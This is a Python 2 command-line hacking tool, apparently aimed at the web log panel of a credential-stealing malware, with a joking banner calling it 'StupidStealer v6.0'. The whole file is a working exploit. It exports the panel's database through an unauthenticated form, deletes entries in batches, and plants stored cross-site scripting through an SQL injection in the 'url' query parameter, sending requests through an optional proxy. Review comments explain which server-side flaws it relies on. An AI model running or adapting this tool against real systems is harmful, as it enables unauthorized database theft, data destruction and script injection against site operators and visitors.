# author: EBFE
# mail: ebfe@inbox.ru
# requires: the argparse module (bundled with Python 2.7)
# for Python < 2.7: run "easy_install argparse"
import argparse, sys, urllib, random, time
# Alphabet for the random filler values: the ten digits, then upper-case
# ASCII letters, then lower-case ASCII letters (62 symbols in that order).
a_z = list(map(chr, range(ord('a'), ord('z') + 1)))
A_Z = [letter.upper() for letter in a_z]
chars = list("0123456789")
chars.extend(A_Z)
chars.extend(a_z)
def get_args():
    """Parse sys.argv and return the resulting argparse namespace.

    Attributes on the result: URL (required positional), dump (a file opened
    in append mode, or sys.stdout when -d is given without a value), delete
    (a two-item list of ints), inject (a string; the built-in const markup
    when -i is given without a value) and proxy (a string). Options that are
    not supplied are None.
    """
    cli = argparse.ArgumentParser(
        description="EBFE's one command line 'StupidStealer v6.0' H4ckT00l :)")

    # (flags, keyword settings) pairs, registered in the order listed.
    option_table = (
        (('URL',),
         dict(type=str, help='target URL, e.g "http://l337url.cc"')),
        (('-d', '--dump'),
         dict(metavar='file', nargs='?', type=argparse.FileType('a'),
              const=sys.stdout,
              help='dump MySQL database to file (default: <stdout>)')),
        (('-del', '--delete'),
         dict(metavar=('from', 'to'), type=int, nargs=2,
              help='delete data entries from MySQL database\n\n'
                   'from = startvalue, to = endvalue')),
        (('-i', '--inject'),
         dict(metavar='XSS Code', nargs='?', type=str,
              help='inject some HTML code, max. length: 255 '
                   '(default: %(const)s)',
              const='<script type="text/javascript">while(1) '
                    'alert("u w3r3 h4x0r3d by m3 :)")</script>')),
        (('-p', '--proxy'),
         dict(type=str, metavar='http://proxy.example.com:8080',
              help='use a http proxy')),
    )
    for flags, settings in option_table:
        cli.add_argument(*flags, **settings)
    return cli.parse_args()
def rand_string(minlen, maxlen):
    """Return a random string built from the module-level `chars` list.

    The length comes from random.randrange(minlen, maxlen), so it satisfies
    minlen <= length < maxlen.
    """
    length = random.randrange(minlen, maxlen)
    return "".join(random.choice(chars) for _ in range(length))
def rand_ip():
    """Return a random dotted-quad string; each of the four fields is in 0..254."""
    octets = []
    for _ in range(4):
        octets.append(str(random.randrange(255)))
    return ".".join(octets)
def rand_date():
    """Return a "DD:MM:YYYY" string for a UTC instant within one day of now."""
    one_day = 60 * 60 * 24
    now = time.time()
    shifted = now + random.randrange(-one_day, one_day)
    return time.strftime("%d:%m:%Y", time.gmtime(shifted))
# protocol, url, user, pass, pcname, date, ip)
def inject():
    """Request args.URL with an ``action=add`` query string whose 'url' field carries args.inject.

    Reads the module-level ``args`` namespace (URL, inject, proxy). The query
    string also sets protocol=msn and random user/pass/pcname/date values, so
    the request appears in a web-server access log as a single
    ``?action=add&protocol=msn&...`` hit. Prints the HTTP status code and the
    length of the response body, then closes the response.

    NOTE(review): the suffix appended to the markup only matters if the
    receiving application concatenates the 'url' parameter into an SQL
    statement and later renders the stored value without HTML-encoding --
    presumably the case for the targeted panel; bound query parameters and
    output encoding on the server side would neutralise both. Confirm against
    the panel's source.
    """
    # args.inject followed by a fixed suffix: a closing quote, five random
    # quoted values and a trailing SQL comment marker. The extra `url`
    # binding is redundant -- `url` is reassigned by the next statement.
    injection = url = args.inject +\
        "\', %s, %s, %s, %s, %s);-- '".replace("%s", "\'%s\'") %\
        (rand_string(3,10), rand_string(5, 12),
         rand_string(5, 10), rand_date(), rand_ip())
    # urlencode percent-encodes the whole value, so the markup and quotes
    # travel encoded inside the 'url' query parameter.
    url = args.URL + '?' + urllib.urlencode((('action', 'add'),
        ('protocol', 'msn'),('url', injection), ('user', rand_string(3, 10)),
        ('pass', rand_string(5, 12)), ('pcname', rand_string(5, 10)),
        ('date', rand_date())))
    page = urllib.urlopen(url, args.proxy)
    print "HTTP %d \nContent-Length: %d" % (page.getcode(), len(page.read()))
    page.close()
def dump():
    """POST the 'export_all' form to args.URL and write the reply to args.dump.

    Reads the module-level ``args`` namespace (URL, dump, proxy). The request
    body is ``export_all=Export+All+Logs``; no cookie, token or credential is
    sent with it, so a successful export suggests the export handler is
    reachable without a session -- presumably; confirm on the server side.
    Prints the HTTP status code. The caller closes args.dump.
    """
    print("dumping '%s' DB to: '%s'" % (args.URL, args.dump.name))
    form_body = urllib.urlencode({'export_all': 'Export All Logs'})
    response = urllib.urlopen(args.URL, form_body, args.proxy)
    print("HTTP %d" % response.getcode())
    args.dump.write(response.read())
    response.close()
def delete(start, end):
    """POST one delete form to args.URL selecting ids start .. end-1.

    Reads the module-level ``args`` namespace (URL, proxy). The body begins
    with ``delete=Delete`` followed by one ``sel[]`` field per id; urlencode
    percent-encodes the brackets, so on the wire each field reads
    ``sel%5B%5D=<id>``. No cookie, token or credential is sent. Prints the
    HTTP status code and closes the response.
    """
    fields = [('delete', 'Delete')]
    fields.extend(('sel[]', entry_id) for entry_id in xrange(start, end))
    print("deleting from %d to %d ..." % (start, end))
    form_body = urllib.urlencode(fields)
    response = urllib.urlopen(args.URL, form_body, args.proxy)
    print("HTTP %d" % response.getcode())
    response.close()
def main():
    """Run the actions selected on the command line, in the order dump, delete, inject.

    Works on the module-level ``args`` namespace and mutates it: '/index.php'
    is appended to args.URL, args.proxy is wrapped in a dict, and single
    quotes in args.inject are replaced by double quotes before inject() runs.
    Deletion is issued in batches of 100 ids; the final batch is not clamped
    to the requested end value, so it can cover ids past it.
    """
    args.URL += '/index.php'

    if args.proxy:
        print("proxy: %s" % args.proxy)
        args.proxy = {"http:": args.proxy}

    if args.dump:
        dump()
        args.dump.close()

    if args.delete:
        first_id, last_id = args.delete[0], args.delete[1]
        for batch_start in xrange(first_id, last_id, 100):
            delete(batch_start, batch_start + 100)

    if args.inject:
        args.inject = args.inject.replace("\'", "\"")
        print("inject XSS:\n%s\nto:'%s'" % (args.inject, args.URL))
        inject()
# Runs as soon as the module is loaded: the command line is parsed into the
# module-level `args` namespace that inject(), dump(), delete() and main()
# all read, and the selected actions are then executed.
args = get_args()
main()